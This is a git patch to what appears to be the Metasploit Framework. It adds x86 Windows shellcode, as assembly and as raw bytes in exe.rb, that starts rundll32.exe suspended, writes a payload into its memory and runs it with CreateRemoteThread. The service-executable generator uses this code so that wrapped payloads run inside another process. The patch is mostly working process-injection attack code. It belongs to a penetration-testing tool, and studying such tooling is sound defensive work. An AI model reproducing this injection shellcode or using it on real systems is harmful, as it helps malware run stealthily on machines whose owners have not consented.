From 25d48b73009aca99a6665c10cec07d3d621b3de2 Mon Sep 17 00:00:00 2001
From: Florian Gaultier <florian@scrt.ch>
Date: Fri, 3 Jan 2014 12:16:37 +0100
Subject: [PATCH] Add create_remote_process block, now used in exe_service
 generation

---
 .../src/block/block_create_remote_process.asm | 82 +++++++++++++++++++
 .../single/single_create_remote_process.asm   | 17 ++++
 .../x86/src/single/single_service_stuff.asm   |  3 +-
 lib/msf/util/exe.rb                           | 32 +++++---
 4 files changed, 123 insertions(+), 11 deletions(-)
 create mode 100644 external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
 create mode 100644 external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm

diff --git a/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
new file mode 100644
index 0000000000..d28a4eee10
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm
@@ -0,0 +1,82 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+xor edi, edi
+push 0x00000004 ;PAGE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00000054 ;STARTUPINFO+PROCESS_INFORMATION
+push edi 
+push 0xE553A458 ;call VirtualAlloc() 
+call ebp
+
+mov dword [eax], 0x44
+lea esi, [eax+0x44]
+push edi
+push 0x6578652e
+push 0x32336c6c
+push 0x646e7572
+mov ecx, esp	;"rundll32.exe"
+push esi		;lpProcessInformation
+push eax		;lpStartupInfo
+push edi		;lpCurrentDirectory
+push edi		;lpEnvironment
+push 0x00000044	;dwCreationFlags
+push edi		;bInheritHandles
+push edi		;lpThreadAttributes
+push edi		;lpProcessAttributes
+push ecx		;lpCommandLine
+push edi		;lpApplicationName
+push 0x863FCC79
+call ebp 		;call CreatProcessA()
+
+mov ecx, [esi]
+push 0x00000040 ;PAGE_EXECUTE_READWRITE
+push 0x00001000 ;MEM_COMMIT
+push 0x00001000	;Next Shellcode Size
+push edi
+push ecx		;hProcess
+push 0x3F9287AE ;call VirtualAllocEx()
+call ebp
+
+mov edi, eax
+mov ecx, [esi]
+lea edx, [ebp+0x12a] ;pointer on the next shellcode
+push esp
+push 0x00001000	;Next Shellcode Size
+push edx		;
+push eax		;lBaseAddress
+push ecx		;hProcess
+push 0xE7BDD8C5
+call ebp 		;call WriteProcessMemory()
+
+xor eax, eax
+mov ecx, [esi]
+push eax		;lpThreadId
+push eax		;dwCreationFlags
+push eax		;lpParameter
+push edi		;lpStartAddress
+push eax		;dwStackSize
+push eax		;lpThreadAttributes
+push ecx		;hProcess
+push 0x799AACC6
+call ebp 		;call CreateRemoteThread()
+
+mov ecx, [esi]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
+
+mov ecx, [esi+0x4]
+push ecx
+push 0x528796C6
+call ebp 		;call CloseHandle()
+
+push edi
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
new file mode 100644
index 0000000000..1b73bb1abc
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_create_remote_process.asm
@@ -0,0 +1,17 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 189 bytes + strlen(libpath) + 1
+; Build: >build.py single_create_remote_process
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
index e63119c276..40cd4cd111 100644
--- a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
+++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
@@ -14,4 +14,5 @@
 %include "./src/block/block_api.asm"
 start:                   ;
   pop ebp                ; pop off the address of 'api_call' for calling later.
-%include "./src/block/block_service.asm"
\ No newline at end of file
+%include "./src/block/block_service.asm"
+%include "./src/block/block_create_remote_process.asm"
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index e52fc625a4..ea17a5bb19 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -524,6 +524,9 @@ require 'msf/core/exe/segment_injector'
       precode_size -= 0x0d
       svcctrlhandler_code_offset = precode_size + pushed_service_name.length
 
+      precode_size += 0xe4
+      shellcode_code_offset = precode_size + (pushed_service_name.length * 2)
+
       # code_service could be encoded in the future
       code_service =
         "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
@@ -536,16 +539,25 @@ require 'msf/core/exe/segment_injector'
         "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
         "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
         "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
-        "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1\x8D\x85" +
-         [svcmain_code_offset].pack('<I')+"\x6A\x00\x50\x51\x89\xE0\x6A\x00" +
-        "\x50\x68\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF" +
-        "\xD5\x58\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81" +
-        "\xED"+[hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1" +
-        "\x8D\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50" +
-        "\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A\x00" +
-        "\x6A\x00\x6A\x00\x6A\x04\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68\xC6" +
-        "\x55\x37\x7D\xFF\xD5"
-      
+        "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" +
+        "\x8D\x85"+[svcmain_code_offset].pack('<I')+"\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
+        "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
+        "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED" +
+         [hash_code_offset].pack('<I')+pushed_service_name+"\x89\xE1\x8D" +
+        "\x85"+[svcctrlhandler_code_offset].pack('<I')+"\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
+        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5\x31\xFF\x6A" +
+        "\x04\x68\x00\x10\x00\x00\x6A\x54\x57\x68\x58\xA4\x53\xE5\xFF\xD5" +
+        "\xC7\x00\x44\x00\x00\x00\x8D\x70\x44\x57\x68\x2E\x65\x78\x65\x68" +
+        "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
+        "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
+        "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
+        "\x92\x3F\xFF\xD5\x89\xC7\x8B\x0E\x8D\x95"+[shellcode_code_offset].pack('<I')+"\x54\x68" +
+         [code.length].pack('<I')+"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF\xD5\x31\xC0" +
+        "\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A\x79\xFF\xD5" +
+        "\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04\x51\x68\xC6" +
+        "\x96\x87\x52\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+
       return to_winpe_only(framework, code_service + code, opts)
     end
   end